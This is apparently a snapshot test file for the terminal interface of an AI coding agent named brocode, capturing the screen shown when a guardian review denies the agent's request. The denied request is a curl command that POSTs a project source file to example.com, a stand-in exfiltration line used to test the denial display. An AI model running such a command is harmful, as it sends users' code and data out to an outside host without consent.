brocode-rs/tui_app_server/src/chatwidget/snapshots/brocode_tui_app_server__chatwidget__tests__app_server_guardian_review_denied_renders_denied_request.snap
---
source: tui_app_server/src/chatwidget/tests.rs
assertion_line: 11423
expression: term.backend().vt100().screen().contents()
---







✗ Request denied for brocode to run curl -sS -i -X POST --data-binary @core/src
  /brocode.rs https://example.com

• Working (0s • esc to interrupt)


› Ask brocode to do anything

  ? for shortcuts                                                                                                        100% context left
